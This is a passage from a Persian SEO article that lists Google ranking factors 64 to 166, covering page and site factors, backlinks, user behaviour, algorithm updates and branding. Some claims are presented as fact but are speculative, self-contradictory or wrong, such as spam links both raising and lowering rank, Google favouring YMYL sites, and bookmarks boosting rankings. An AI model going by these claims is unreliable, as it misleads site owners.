۶۴. لینک های خروجی بیش از حد

این موضوع مستقیماً از منابع معتبر گفته شده است که از یک صفحه نباید لینک های زیادی را خارج نمود.

۶۵.تعداد کلمات کلیدی فرعی برای رتبه بندی سایت

ما به دنبال سایت‌هایی هستیم که بسیاری از کاربران برای جستجوهای مشابه از آن استفاده می‌کنند اگر یک صفحه بتواند روی چندین کلمه کلیدی مختلف امتیاز بگیرد، برای گوگل نشانه‌ای از کیفیت محتوا است. 

۶۶. عمر صفحه

اگر چه گوگل محتوای تازه را ترجیح می دهد اما صفحات قدیمی که به طور مرتب به روزرسانی می شوند نیز ممکن است یک صفحه جدیدتر ترجیح داده شوند.

۶۷. چیدمان مناسب برای کاربر

بگذارید دوباره به دستورالعمل های کیفیت گوگل اشاره ای داشته باشیم :

صفحه هایی که بصورت حرفه ای چیده شده اند، نمایانگر این هستند که محتوایشان خوب و اصل است.  چیدمان و طراحی یک صفحه با بالاترین کیفیت، باعث می شود محتوای اصلی بلافاصله قابل مشاهده باشد. در واقع کاربرپسند یا User Friendly بودن، یکی از ویژگی‌های کیفی صفحه محسوب می شود.

۶۸. دامنه های پارک شده

دامنه پارک شده یعنی یک وب سایت با چند دامین مختلف و جداگانه مشاهده شود. از سال 2011 با به روز رسانی های گوگل پارک کردن دامنه بسیار کم تاثیر شده است.

۶۹. محتوای مفید

همانطور که توسط Jared Carrizalesخواننده Backlinkoاشاره کرد، گوگل ممکن است بین “کیفیت” و “مفید بودن ” محتوا تمایز قائل شود. گوگل می تواند بین محتوای با کیفیت و مفید تفاوت بگذارد. گوگل با استفاده از الگوریتم هایی که دارد تفاوت بین کیفیت و مفید بودن محتوا بررسی می کند. پس در تولید محتوای سایتتان سعی کنید کیفیت و مفید بودن محتوا را جز اصلی ترین اهداف خود قرار دهید.

فاکتورهای سئو مربوط به سطح سایت

فاکتورهای سئو مربوط به سطح سایت

۷۰. ارزش تولیدکنندگان محتوا و اطلاعات منحصر به فرد

گوگل اعلام کرده است که خوشبختانه سایت هایی که چیز جدید یا مفیدی برای عرضه ندارند، به خصوص سایت های ضعیف و وابسته را مجازات می کند. محتوای با ارزش و مفید جزو فاکتورهای گوگل برای سئو به حساب می آید.

۷۱. صفحه تماس با ما

سند کیفیت گواهینامه فوق بیان می کند که آنها سایت هایی را با “مقدار مناسب اطلاعات تماس” ترجیح می دهند. اطمینان حاصل کنید که مخاطبین شما با این اطلاعات Whoisشما مرتبط هستند.

۷۲. اعتبار رتبه (Trust Rank)

بسیاری از جستجوگرها بر این باورند که TrustRankیک عامل مهم رتبه بندی است و به نظر می رسد اخطار گوگل که به تازگی تحت عنوان “رتبه بندی نتایج جستجو بر اساس اعتماد”، اعلام شده است، از این موضوع پشتیبانی می کند.

فاکتور اعتبار رتبه (Trust Rank) در سئو

۷۳. معماری سایت

سایت که معماری خوبی دارد (مثل، یک ساختار silo) به گوگل کمک می کند تا محتوای آن را مرتب کند. همچنین، این موضوع به Google botکمک می کند تا به همه صفحات سایت تان دسترسی پیدا کرده و آنها را نمایش دهد.

۷۴. به روز رسانی سایت

گرچه گوگل اخیرا استفاده از الگوریتم “فراوانی انتشار” را انکار کرده است .بسیاری از سئوکار ها بر این باورند که به روز رسانی وب سایت، به خصوص هنگامی که محتوای جدید به سایت اضافه می شود، عامل نوآوری در سطح سایت است.

۷۵. وجود نقشه سایت

یک نقشه سایت به موتورهای جستجو کمک می کند صفحات شما را ساده تر و کامل تر، نمایش دهند تا مشاهده آن نیز بهبود یابد. سایت مپ لیستی از مهم‌ترین محتواهای موجود در سایت را شامل می‌شود. در نتیجه ربات‌های گوگل می توانند به ‌راحتی این محتواها را پیدا کنند و ایندکس کنند که این کار موجب بهتر دیده شدن سایت در موتورهای جستجوگر می شود.

۷۶. زمان آپلود سایت

بسیاری از خرابی های مربوط به نگهداری سایت یا مسائل مربوط به سرور ممکن است به رتبه بندی های شما آسیب برساند (و حتی اگر درست نشود، ممکن است باعث خارج شدن سایت تان از لیست نتایج گوگل شود.).

۷۷. محل سرور

موقعیت سرور بر روی سایت شما در مناطق مختلف جغرافیایی تأثیر می گذارد. این موضوع در جستجوی جغرافیایی از اهمیت خاصی برخوردار است.

۷۸. گواهی SSL

گوگل تایید کرده است که استفاده از HTTPS یک سیگنال رتبه بندی محسوب می شود.

گواهی SSL در فاکتورهای مهم سئو

هرچند به گفته گوگل، HTTPS تنها به عنوان یک “گل طلایی “عمل می کند.

۷۹. صفحات حریم خصوصی و شرایط خدمات

این دو صفحه به گوگل القا می کند که سایت شما را معتبر بداند. آنها همچنین ممکن است به بهبود سایت E-A-T شما کمک کنند.

۸۰. اطلاعات متای تکراری در سایت

اطلاعات متای تکراری در هر جای سایت شما ممکن است میزان نمایش صفحه شما را کاهش دهد. در حقیقت، اگر تعداد زیادی از این ها را داشته باشید، کنسول جستجوی گوگل به شما هشدار می دهد.

اطلاعات متای تکراری در سایت در فاکتورهای سئو

۸۱. استفاده از breadcrumb

این یک سبک از معماری سایت مناسب برای کاربران است که به کاربران (و موتورهای جستجو) کمک می کند که بدانند در کجای سایت هستند!

گوگل می گوید: “جستجوی این سایت با استفاده از نشانه گذاری ناقص در بدنه یک صفحه وب به منظور طبقه بندی اطلاعات از صفحه در نتایج جستجو انجام می شود.”

۸۲. بهینه سازی برای موبایل

از آنجایی که بیش از نیمی از تمام جستجوهای انجام شده از طریق دستگاه های تلفن همراه بوده است، گوگل می خواهد ببیند که آیا سایت شما برای کاربران تلفن همراه بهینه سازی شده است یا نه. در حقیقت، گوگل اکنون وب سایت هایی را که برای موبایل مناسب نیستند را مجازات می کند.

۸۳. یوتیوب

شکی نیست که ویدئوهای یوتیوبی(احتمالا به این دلیل که گوگل صاحب آن است): در SERPsترجیح داده می شوند.

در حقیقت، Search Engine Land دریافته است که ترافیک YouTube.comبه طور قابل توجهی پس از Google Panda افزایش یافته است.

۸۴. قابلیت استفاده از سایت

سایتی که استفاده از آن، دشوار باشد می تواند به طور غیرمستقیم با کاهش زمان بر روی سایت، صفحات مشاهده شده و میزان بازده (به عبارت دیگر، عوامل رتبه بندی RankBrain) به رتبه خود آسیب برساند.

۸۵. استفاده از گوگل آنالیز و کنسول جستجوی گوگل

برخی فکر می کنند که نصب کردن این دو برنامه در سایت شان، ممکن است نمایه سازی صفحه آنها را بهبود بخشد. آنها همچنین می توانند به طور مستقیم با دادن اطلاعات بیشتر به گوگل برای کار با رتبه بندی (به عنوان مثال، میزان دقیق تر بازدهی، صرف نظر از اینکه آیا شما از ترافیک ارجاع شده از بک لینک ها استفاده می کنید و …. ) تاثیر می گذارد. اما گوگل این موضوع را یک شایعه خوانده و آن را رد کرده است.

  آموزش لینک سازی خارجی

۸۶. نظرات کاربران / شهرت سایت

شهرت سایت در سایت هایی مانند Yelp.com به احتمال زیاد نقش مهمی در الگوریتم گوگل دارد. حتی گوگل چارچوب کاندید شدن نادری را در مورد چگونگی استفاده از نظرات کاربران بعد از گرفتار شدن سایت در طوفان نظرات مشتریان در تلاشی برای فشرده سازی و لینک دهی منتشر کرد.

فاکتورهای سئو بک لینک

فاکتورهای سئو بک لینک

۸۷. لینک دهی عمر دامنه

بک لینک هایی که از دامنه های قدیمی هستند ممکن است قوی تر از دامنه های جدید عمل کنند.

۸۸. تعداد لینک دهی به دامنه های ریشه

تعداد دامنه های ارجاع یکی از مهم ترین عوامل رتبه بندی در الگوریتم گوگل است، همانطور که می توانید در این مطالعه صنعتی، 1 میلیون از نتایج جستجوی گوگل مشاهده کنید.

فاکتور تعداد لینک دهی به دامنه های ریشه در سئو

۸۹. تعداد لینک های مجزا از IP های کلاس C

لینکهایی که به صورت مجزا از آدرس های IPکلاس Cا یجاد می شوند، نشان دهنده دامنه وسیع سایت هایی هستند که با شما ارتباط دارند و این موضوع می تواند به رتبه بندی سایت شما کمک کند.

۹۰. تعداد لینک های صفحات

تعداد کل صفحات لینک دار – حتی از یک دامنه مشابه – در رتبه بندی مؤثر است.

۹۱. انکر تکست بک لینک

همانطور که در توضیحات الگوریتم اصلی گوگل اشاره شد:

بدیهی است که انکرتکست کمتر از قبل اهمیت دارد (و هنگامی که بیش از حد بهینه شده است، به عنوان یک سیگنال وب اسپم کار می کند) اما انکرتکست غنی با کلمه کلیدی هنوز هم یک سیگنال ارتباط قوی در دوزهای کوچک ارسال می کند.

۹۲. استفاده از ALT (برای لینک های تصویری)

متن Alt به عنوان انکرتکست متن برای تصاویر عمل می کند. در تگ alt از کلمات کلیدی مرتبط با موضوع استفاده کنید تا کاربران از طریق تصاویرهم به سایت شما دسترسی پیدا کنند.

۹۳. لینک از دامنه های .edu یا .gov

مت کاتز اعلام کرده است که TLD فاکتور اهمیت سایت نیست و گوگل گفته است که بسیاری از لینک های Eduرا نادیده می گیرد. با این حال، این امر سئوکاران را از اینکه فکر کنند الگوریتم TLDهای .gov و .edu جایگاه خاصی دارد، باز نمی دارد.

۹۴. اعتبار صفحه لینک ‌دهنده

مرجع (PageRank) از روزهای ابتدایی گوگل یک عامل رتبه بندی بسیار مهم بوده و هنوزهم هست. گوگل تذکر می دهد: اطمینان حاصل کنید که بقیه صفحات به شما لینک می‌دهند. لینک‌ها کمک می‌کنند که ربات‌های گوگل سایتتان را بیابند و سایتتان رتبه  بهتری کسب کند.

۹۵. قدرت دامنه لینک شده

قدرت دامنه لینک شده می تواند نقشی مستقل در ارزش لینک داشته باشد.

۹۶. لینک گرفتن از رقبا

لینک های سایر صفحات که در همان SERP رتبه بندی می شوند، یعنی  اعتبار و رتبه یکسانی با شما در نتایج گوگل دارند، ممکن است برای رتبه بندی یک صفحه برای آن کلمه کلیدی خاص ارزش بیشتری داشته باشند.

۹۷. لینک گرفتن از سایت های “مورد انتظار”

هرچند این موضوع فقط حدس است اما برخی از سئوکار ها بر این باورند که تا زمانی که از مجموعه ای از سایت های مورد انتظار در صنعت خود لینک پیدا کنید، گوگل به طور کامل به وب سایت شما اعتماد نخواهد کرد .

۹۸. لینک از سایت های مجاور نامناسب

چنین لینک هایی که اصطلاحاً “محله های بد” نامیده می شود، ممکن است به سایت شما آسیب برساند.

۹۹. گزارشات مهمان

اگر چه لینکهایی که از پست مهمان منتشر می شود، همچنان ارزش خود را حفظ می کنند اما احتمالا به عنوان لینک های سرمقاله واقعی قدرتمند نیستند (علاوه بر این، پست مهمان در مقیاس بزرگ می تواند سایت شما را با مشکل مواجه کند).

۱۰۰. لینک های تبلیغاتی

به گفته گوگل، لینک های تبلیغاتی باید no-follow باشند. با این حال، احتمال دارد که گوگل قادر به شناسایی و فیلتر کردن لینکهای پیگیری شده از تبلیغات باشد.

۱۰۱. ارزش اعتبار صفحه اصلی

لینک دادن به صفحه اصلی سایت می تواند به افزایش اعتبار صفحه اصلی شما بسیار کمک کند.

۱۰۲. لینک های no-follow

لینک های نو فالوو ممکن است با توجه به این صحبت گوگل که گفته “ما این لینک ها را دنبال نخواهیم کرد” بی ارزش به نظر برسند، اما اینطور نیست و این لینک ها می تواند ثابت کند که سایت شما بطور طبیعی لینک گرفته یا خیر.

۱۰۳. تنوع لینک های خارجی

این که شما از سایت ها با تنوع زیاد لینک داشته باشید بسیار مهم است، البته این گفته اشتباه برداشت نشود، منظور ما از تنوع لینک این نیست که از سایت ها با موضوعات کاری مختلف لینک بگیرید، منظور این است که جنس لینک هایی که میگیرید مختلف باشد، بطور مثال لینک از فروم ها، وبلاگ ها، رپورتاژ آگهی و …

۱۰۴. لینک های اسپانسری

لینک های اسپانسری که در بخش هایی مثل همکاران ما، مشتریان ما و … که داده می شود می تواند بسیار با اعتبار باشد. کلماتی مانند  Sponsored Links، Sponsered  و Link Partners ممکن است تأثیر متفاوتی با یک لینک معمولی داشته باشند. (لینک‌های حمایتی معمولاً بی اهمیت تر هستند).

۱۰۵. لینک های متنی

لینک هایی که در متن داده می شود، مانند همین لینک هایی که ما در همین مقاله ساخته ایم می تواند بسیار به افزایش رتبه سایت شما کمک نماید.

مهم ترین فاکتورهای سئو

۱۰۶. بک لینک ها با ریدایرکت ۳۰۱

با توجه به اینکه زمانی که شما صفحه ای را ریدایرکت ۳۰۱ میزنید، تمام اعتبار آن صفحه به صفحه جدید منتقل می شود، بنابراین لینک هایی که با ریدایرکت ۳۰۱ منتقل می شوند هم بسیار مناسب است. اما، مقدار بیش از حد بک‌ لینک‌هایی که از ریدایرکت 301 حاصل می شوند، باعث ضعیف شدن PageRank خواهند شد، و می توانند اثر منفی بر روی رتبه بندی بگذارند.

۱۰۷. لینک های داخلی با انکر تکست

لینک هایی که بین صفحات سایتتان می سازید و با انکرتکست به صفحات دیگر لینک می دهید بسیار بر سئو سایت شما تاثیرگذار هستند.

۱۰۸. انتخاب عنوان برای لینک ها

در صورتی که عنوانی برای لینک هایتان مشخص کنید می تواند یک سیگنال ضعیف مثبت به گوگل بفرستد. عنوان لینک یا همان متنی که به هنگام نگه داشتن موس بر روی لینک آشکار می‌شود، نیز به عنوان فاکتور کمی مهم برای رتبه بندی سایت است.

۱۰۹. لینک از سایت های دامنه محلی

اگر از سایت هایی با دامنه محلی لینک بگیرید بطور مثال در ایران از سایت های (.ir) لینک بگیرید می تواند برروی بهتر شدن جایگاه شما در سرچ هایی که از ایران انجام تاثیرگذار باشد.

۱۱۰. جایگاه لینک ها در مقالات

بسیاری از سئوکار ها بر این باور هستند که لینک هایی که در ابتدای مقاله ها داده می شوند ارزش بیشتری نسبت به لینک هایی که در قسمت های پایین تر داده می شوند، دارند.

۱۱۱. جایگاه لینک ها در صفحات

لینک هایی که در بخش اصلی صفحه مثل مقالات و محتوا داده می شود بسیار قوی تر از لینک هایی است که در بخش هایی مثل فوتر و هدر سایت و ساید بار داده می شوند.

۱۱۲. لینک از سایت های مرتبط

لینک گرفتن از سایتهایی که از نظر موضوعی با سایت شما یکسان هستند بشدت برروی رتبه سایت شما تاثیر مثبت دارند. به همین علت نیز استراتژی موثر سئو، بر روی به دست آوردن لینک های مرتبط تمرکز دارد.

۱۱۳. لینک از صفحات با level بالا

لینک هایی که از صفحات اصلی سایت های دیگر دریافت می کنید بسیار تاثیرگذار تر از لینک هایی است که از صفحات فرعی دریافت می کنید. لینک از صفحه ای که به محتوای صفحه شبیه است و موضوع یکسانی دارد، خیلی با ارزش تر و موثرتر از لینکی است که از یک صفحه ی بی ربط با موضوع داده می شود.

۱۱۴. استفاده از کلمه کلیدی در عنوان

استفاده از کلمه کلیدی در عنوان می تواند بسیار زیاد بر جایگاه شما در نتایج جستجو تاثیر گذار است. این فاکتور یکی از مهمترین فاکتورهای سئو است.*

۱۱۵. لینک های خوب و با کیفیت (سرعت لینک مثبت)

داشتن لینک های با کیفیت می تواند شما را در نتایج جستجو بسیار زیاد بالا ببرد. سرعت دریافت لینک وقتی مثبت است که در یک زمان خاص مثلاً  سالانه، تعداد بک ‌لینک‌ها افزایش پیدا کرده باشد. سایتی که سرعت دریافت لینکش مثبت است، معمولاً نتایج بهتری در موتورهای جستجو دریافت می‌کند، چون نشانه ی آن است که سایت شما کاربران بیشتری را جذب کرده است.

۱۱۶. لینک های بی کیفیت (سرعت لینک منفی)

خریدن لینک از سایت های اسپم و سایت هایی که لینک زیادی به سایت های مختلف می دهند می تواند رتبه شما را بسیار زیاد افزایش دهد و باعث افت جایگاه شما شوند. با این وجود، اگر سرعت لینک شما در حال کاهش باشد، این امر نشاندهنده جذاب نبودن سایت می باشد.

۱۱۷. لینک گیری از سایت های پر بازدید

لینک گرفتن از سایت هایی که بازدید زیادی دارند می تواند بسیار زیاد به رتبه سایت شما کمک نماید.

۱۱۸. لینک از سایت های با آتوریتی بالا

لینک گیری از سایت هایی با دامین آتوریتی بالا، بسیار خوب است.این امر می تواند تاثیر خوبی نسبت به سایت های کوچک و ناشناس داشته باشد.

۱۱۹. لینک گرفتن از ویکی پدیا

لینک گرفتن از ویکی پدیا خصوصاً‌ در صفحه ی مرتبط با کارتان بسیار بسیار خوب و موثر است. البته کار بسیار سختی هم هست.

۱۲۰. استفاده از کلمات مرتبط

ار کلماتی که به کلمه اصلی شما شباهت دارد در بک لینک هایتان استفاده نمایید.

۱۲۱. سن بک لینک ها

با توجه به صحبت های گوگل بک لینک هایی که مدت زمان بیشتری از عمر ساخته شدنشان می گذرد ارزشمند تر از بک لینک هایی هستند که جدید ساخته می شوند.

۱۲۲. لینک گرفتن از سایت های واقعی

با توجه به اینکه گوگل تشخیص می دهد که کدام سایت واقعی است و کدام سایت یک بلاگ غیر فعال، بنابراین سعی کنید از سایت هایی لینک بگیرید که فعال هستند نه بلاگ هایی که غیر فعال اند. آنها احتمالاً برای تمایز بین این دو از علائم تجاری و تعامل کاربران استفاده می کنند.

۱۲۳. لینک های طبیعی پروفایل

لینک هایی که بطور طبیعی از پروفایل ها ساخته می شود بسیار با ارزش هستند. این چنین سایت ها با لینک های طبیعی، دارای رتبه بالایی خواهند بود، و نسبت به سایتی که به طور واضح از استراتژی های کلاه سیاه برای ایجاد لینک استفاده کرده است، از ماندگاری بالاتری برخوردار هستند.

۱۲۴. تبادل لینک

لینک هایی که با هدف تبادل ساخته می شوند در جهت جلوگیری از لینک های اسپم استفاده می شوند. صفحه Google’s Link Schemes تبادل لینک بیش از حد را به عنوان یک طرح پیوندی رد کرده است، همیشه توصیه کرده است که وب سایت ها از ساخت چنین لینک هایی پرهیز کنند.

۱۲۵.لینک های ساخته شده توسط کاربران

گوگل تا حدودی می تواند لینک‌های UCG را از لینک‌های واقعی مالک سایت شناسایی کند وتشخیص دهد که جنس لینک ها ساخته شده توسط کاربران معمولی است یا سایت های حرفه ای. بطور مثال، جنس لینکی که شما از سایت اصلی wordpress.com می گیرد با جنس لینکی که از example.wordpress.com می گیرید کاملاً متفاوت است، به همین دلیل شما نیاز است که علاوه بر لینک هایی که از سایت های خوب میگیرد، لینک از بلاگ های معمولی هم داشته باشید.

۱۲۶. لینک های ۳۰۱

لینک‌هایی که از تغییر مسیر 301 به دست می‌آیند، ممکن است کمی از کیفیتشان را از دست بدهند. بنابراین نسبت به لینک‌های مستقیم ارزش کمتری دارند. با این حال مت‌کاتز می‌گوید ارزش لینک‌های 301 مشابه لینک‌های مستقیم است.

۱۲۷. استفاده از schema

کد های اسکیما یا شما (Schema) می تواند به افزایش نرخ کلیک سایت شما کمک کند، بطور مثال استفاده از اسکیمای ستاره دار کردن مطالب می تواند در کلیک کاربران برروی لینک شما تاثیرگذار شود.

صفحاتی که حاوی میکروفرمت ها هستند ممکن است رتبه بالاتری نسبت به صفحاتی که فاقد آن ها هستند داشته باشند. که ممکن است یک پیشرفت رتبه را منجر شود، یا این واقعیت باشد که صفحات با میکروفرمت نرخ کلیک (SERP CTR) بالاتری دارند. 

۱۲۸. رتبه اعتماد سایت لینک‌ دهنده (TrustRank of Linking Site)

اعتبار سایتی که لینک می‌دهد معمولاً مشخص می‌کند که چقدر اعتماد و اعتبار به سایت ما منتقل شده است.

۱۲۹. تعداد لینک های خروجی از سایت

صفحاتی که لینک های زیادی از آن ها خارج شده باشد، ارزش کمتری نسبت به صفحاتی دارند که لینک های کمی از آن ها خارج شده است. منظور از لینک های خارج شده، لینک به سایت های دیگر است نه لینک به منابع و لینک های داخلی!

۱۳۰. لینک های فروم

لینک گرفتن از فروم ها با توجه به اینکه این نوع از لینک ها بسیار زیاد باعث سوء استفاده توسط سئوکاران شده ممکن است کم کم اعتبارشان را از دست بدهند.

۱۳۱. میزان لینک در حجم مقالات

لینکی که در بین ۱۰۰۰ کلمه از یک متن قرار می گیرد ارزش بیشتری دارد از لینکی که در بین یک متن ۲۰ کلمه ای ساخته شده است.

۱۳۲. لینک در متن با کیفیت

بسیار مهم است که لینکی که برای شما ساخته می شود در یک مقاله مهم و خوب باشد یا لینکی که در یک متن متوسط یا ضعیف ساخته شده است.

۱۳۳. لینک از سایت های بزرگ

لینک گرفتن از سایت های حجیم و بزرگ توسط افرادی مثل matt cutts تایید شده است.

فاکتورهای سئو مربوط به اقدامات کابران

فاکتورهای سئو مربوط به اقدامات کابران

۱۳۴. رنک برین (rankbrain)

الگوریتم رنک برین تمرکز اصلی اش بر این است که رفتار مخاطبان را بررسی کند و با توجه به این رفتار های کاربری سایت ها را ارزیابی کند که اتفاقاً بسیار زیاد هم این مورد امروزه مهم است اما توسط بسیاری از سئوکاران به آن توجه نمی شود.

۱۳۵. نرخ کلیک (CTR) برای کلمه کلیدی خاص

امروزه بحث های زیادی مطرح می شود که نرخ کلیک در افزایش رتبه در نتایج جستجو تاثیرگذار نیست و … اما این گفته اشتباه است دلیل این امر هم مشخص است. اگر این مورد مهم نبود گوگل برای سرویس ادورزش هم این مورد را در محاسبه هزینه، تاثیر نمیداد! بنابراین مشخص است که گوگل فاکتور CTR را یکی از مهم ترین فاکتورهای سئو در نظر می گیرد.

۱۳۶.نرخ کلیک طبیعی (Organic CTR) برای تمامی کلمات کلیدی

گوگل نرخ کلیک شما را بصورت میانگین هم در نظر می گیرد و از سایت شما یک ارزیابی کلی می کند که آیا این سایت در همه ی صفحات و مقالاتی که گذاشته کاربران را جذب می کند یا خیر و اتقاقاً این مورد از نرخ کلیک یک کلمه کلیدی خاص تاثیرگذار تر است. CTR ارگانیک برای همه کلمات کلیدی در یک سایت که برای آن رتبه بندی شده است، ممکن است یک سیگنال تعامل کاربر مبتنی بر جستجوی کاربر باشد. به عبارت دیگر “یک امتیاز با ارزش” از نتایج ارگانیک است.

۱۳۷. نرخ پرش (bounce rate)

در مورد نرخ پرش، نظرات مختلفی وجود دارد، البته هیچ سئوکاری نیست که بر این باور باشد که bounce rate اهمیت ندارد، بلکه بیشتر نظرات در مورد این است که میزان اهمیت این فاکتور سئو چقدر است که البته من خودم نظر بر این دارم که این فاکتور بسیار مهم است.

ممکن است گوگل بتواند از کاربران خود به عنوان عامل تست کیفیت استفاده کند. (صفحاتی که کاربر تشخیص دهد که احتمالا صفحه خوبی برای کلمه کلیدی مورد نظرش نیست). ویکی دمی به عنوان مجموعه ای که در این حوزه کاری فعالیت دارند، به شما توضیه می کند که صفحاتی که کاربران از آن  به سرعت خارج می شوند، از نظر گوگل دارای مشکل هستند.

۱۳۸. ورودی مستقیم (direct)

گوگل با استفاده از سرویس chrome میتواند محاسبه کند که ورودی سایت شما بصورت دایرکت چقدر است. سایت هایی که از نظر ورودی مستقیم کاربران زیادی داشته باشند، مشخص است که این سایت ها برند هستند و کاربران ارزش بالایی برای این سایت های قائل هستند.

۱۳۹. تکرار ترافیک یا بازدیدهای مجدد

سایت هایی که کابران به آن ها برمی گردند از نظر گوگل بسیار با ارزش هستند.

۱۴۰. بازگشت به نتایج (pogosticking)

بازگشت به نتایج جستجو یا همان pogosticking نوع خاصی از نرخ پرش (bounce rate)‌ است. این نوع از نرخ پرش زمانی انجام می شود که شخصی وارد سایت می شود و بعد از اینکه مشکلش برطرف نشد با زدن دکمه ی بازگشت و رفتن مجدد به نتایج جستجو ، سایت دیگری را انتخاب می کند. گوگل برای سایتی که این اتفاق برایش می افتد یک امتیاز منفی در نظر می گیرد.

۱۴۱. سایت های مسدود شده

سایت هایی که کاربران آن ها را توسط سرویس گوگل کروم مسدود می کنند امتیاز منفی از گوگل دریافت می کنند. البته وظیفه ی برخورد با این سایت ها بر عهده ی الگوریتم پاندا گوگل است.

۱۴۲. بوکمارک کردن سایت ها

Google داده های استفاده از مرورگر Chrome را جمع آوری می کند. ممکن است با این کار صفحاتی که در Chrome علامت گذاری می شوند افزایش پیدا کنند. در نتیجه صفحاتی که در کروم بوک مارک شده‌اند، رتبه بهتری در گوگل خواهند داشت و از نظر گوگل، بسیار ارزشمند هستند.

۱۴۳. تعداد کامنت ها

زمانی که کاربران در یکی از پست ها فعال باشند و یا بطور کلی در سایتی فعالیت داشته باشند و در آن سایت نظر بدهند مشخص است که آن سایت توانسته مخاطبان را درگیر کند و این کار از نظر گوگل بسیار عالی است. فاکتور کامنت یکی از مهم ترین فاکتورهای سئو است.

۱۴۴. مدت زمان ماندن در صفحه

گوگل این مورد را هم در نظر می گیرد که زمانی که کاربری وارد صفحه ای می شود چقدر زمان می برد تا در آن صفحه باقی بمانند.

  مزایای استفاده از دو اتریبیوت جدید nofollow

مدت زمانی که افراد از جستجوی گوگل، در صفحه شما می گذرانند را زمان توقف می گویند. که گوکل، توجه زیادی به این زمان دارد. به طور خلاصه: Google مدت زمان جستجوی کاربر در صفحه شما را اندازه گیری می کند. هرچه مدت زمان بیشتری سپری شود ، بهتر است.

فاکتورهای سئو مربوط به الگوریتم ها

 

۱۴۵. تازه بودن مطالب

گوگل صفحاتی که جدیدتر هستند را بیشتر از بقیه صفحات رتبه دهی می کند.

۱۴۶. متنوع بودن

شما میتوانید صفحات متنوع برای جلوگیری از تکرار بسازید. گوگل، ممکن است برای کلمات کلیدی مبهم مانند “Ted” ، “WWF” به SERP تنوع دهد، تا کاربر بتواند منظور خودش را ازبین آن‌ها پیدا کند.

۱۴۷. استفاده از تاریخچه مرورگر کاربر

ممکن است برای شما پیش آمده باشد زمان که سایتی را قبلاً مشاهده کرده باشید در صفحه جستجو بالاتر از بقیه سایت ها نمایش داده می شود.

۱۴۸. استفاده از تاریخچه جستجو

زمانی که شما قصد داشته باشید در مورد موضوعات مختلف جستجو کنید، گوگل موضوعات شما را بهم ربط خواهد داد و سایت هایی که هر دو موضوع را پوشش داده اند نمایش می دهد.بطور مثال شما در مورد وردپرس جستجو می کنید و بعد در مورد سئو جستجو می کنید. گوگل برای شما بعنوان اولویت سایت هایی که در مورد سئو وردپرس صحبت کرده باشند را بالاتر نمایش می دهد.

۱۴۹. snippets های ویژه

طبق نظریه  SEMRush، گوگل محتوای اسنیپت‌هایی ویژه ای که در اولین نتایج نشان داده می‌شود، را براساس طول محتوا، قدرت و اعتبار صفحه، قالب ‌بندی و استفاده از  https  انتخاب می‌کند.

۱۵۰. محدوده جغرافیایی

اینکه شما با آی پی چه کشوری جستجو می کنید، سرور سایت ها چقدر به شما نزدیک هستند و دامنه ها چه نامی دارند در نمایش نتایج جستجو به شما تاثیرگذار هستند.

 گوگل به سایت‌هایی که IP سرور و نام دامنه مخصوص یک کشور را دارند، ارزش بیشتری قائل می‌شود، و در اولویت نتایج سرچ شده توسط کاربران آن منطقه یا کشور قرار می‌دهد.

۱۵۱. جستجو ایمن

گوگل چند سالی هست که دیگر جستجو هایی که مربوط به محتوای بزرگسالان هست را به کاربران پیشنهاد نمی دهد تا برای سایر افراد با گروه های سنی مختلف مشکل ساز نشود.

۱۵۲. استفاده از گوگل +

البته این مورد دیگر الان که شما در حال خواندن این مقاله هستید به شما کمک نمی کند زیرا دیگر گوگل پلاس به فعالیتش ادامه نمی دهد و چند ماهی است که گوگل+ به اصطلاح مرده است!

۱۵۳. کلمه کلیدی های “YMYL” یا Your Money or Your Life

گوگل به سایت هایی که محتوا هایی برای “زندگی” شما و یا “پول” شما تولید می کنند، رتبه ی خوبی می دهد.

۱۵۴. زیرپا گذاشتن قوانین کپی رایت (DMCA)

گوگل سایت هایی که قوانین کپی رایت را رعایت نمی کنند جریمه می کند. بنابراین قوانین کپی رایت (DMCA) را جدی بگیرید.

۱۵۵. تنوع دامنه ها

بعد از آپدیت گوگل با نام پا گنده، گوگل تصمیم گرفت که سایت های مختلف را برای یک نتیجه ی جستجو نشان دهد و سعی کند اینکه یک سایت در یک صفحه از جستجو چند لینک را به خودش اختصاص دهد را کمتر کند.

۱۵۶. جستجو معاملاتی

گوگل بعضی اوقات نوع جستجو را برای بعضی از کسب و کار ها تغییر می دهد. مانند آژانس های هواپیمایی.

۱۵۷. جستجو ی محلی

برای جستجو محلی گوگل با توجه به جایی که شما جستجو را انجام می دهید نزدیک ترین فروشگاه ها را با توجه به کلمه ای که جستجو کرده اید نمایش می دهد.

۱۵۸. باکس داستان

بعضی از جستجو ها را گوگل برای ساده تر شدن کار کاربران بصورت باکس داستانی نمایش می دهد که به اصطلاح به آن tob stories box گفته می شود.

۱۵۹. نمایش برند های معتبر

پس از به روزرسانی Vince ، Google شروع به تقویت نام تجاری بزرگ برای برخی از کلمات کلیدی کرد و بعد از آن نام تجاری برای گوگل با اهمیت شد و برندهای بزرگ را در نتایج اولیه قرار داد.

۱۶۰. نتایج فروشگاهی

گوگل،گاهی نتایج Google Shopping را در SERP های ارگانیک نمایش می دهد.  در واقع ما می گوییم که گوگل صفحه خرید یا محصول که دارای تصویر، قیمت و اطلاعات محصول است را در سرچ ارگانیک قرار می‌دهد.

۱۶۱. نتایج تصاویر

گوگل در بسیاری از نتایج مخصوصاً زمانی که شما عکس چیزی را جستجو کنید. به شما نتایج عکسی را نشان می دهد.

۱۶۲- نمایش جستجو سریعتر

بعضی اوقات اتفاق می افتد که شما با جستجوی چیزی گوگل به شما بدون اینکه نیاز داشته باشید وارد سایت شوید و بخواهید اطلاعات بگیرید، خودش به شما جواب سوالتان را نمایش می دهد.

۱۶۳. نتایج سایت واحد برای برندها

دامنه یا کلمات کلیدی برندگرا نتایج مختلفی را از همان سایت به ارمغان می آورند. پس زمانی که کلمات کلیدی نام تجاری یا دامنه را سرچ می‌کنید، ممکن است چندین نتیجه از یک سایت در رتبه‌ بندی گوگل موجود باشد.

۱۶۴. آپدیت پرداخت روزانه

این آپدیت بعد از معرفی شدن بسیاری از نتایج جستجو را تحت تاثیر خودش قرار داد.

 

فاکتورهای سئو مربوط به نام تجاری

 

۱۶۵. انکرتکست نام برند (  Anchor Text)

انکر تکست نام برند (متن لینک داده شده نام برند) یک سیگنال ساده، اما قوی است، که بسیار به جستجو با نام برند کمک می‌کند. 

۱۶۶. جستجو با نام برند

افراد با نام برند، خواسته ی خود را جستجو می‌کنند. وقتی کاربران در گوگل به دنبال برند و سایت شما باشند، نشانه آن است که سایت شما یک برند حقیقی است و تاثیر مثبتی بر سئو سایت دارد.

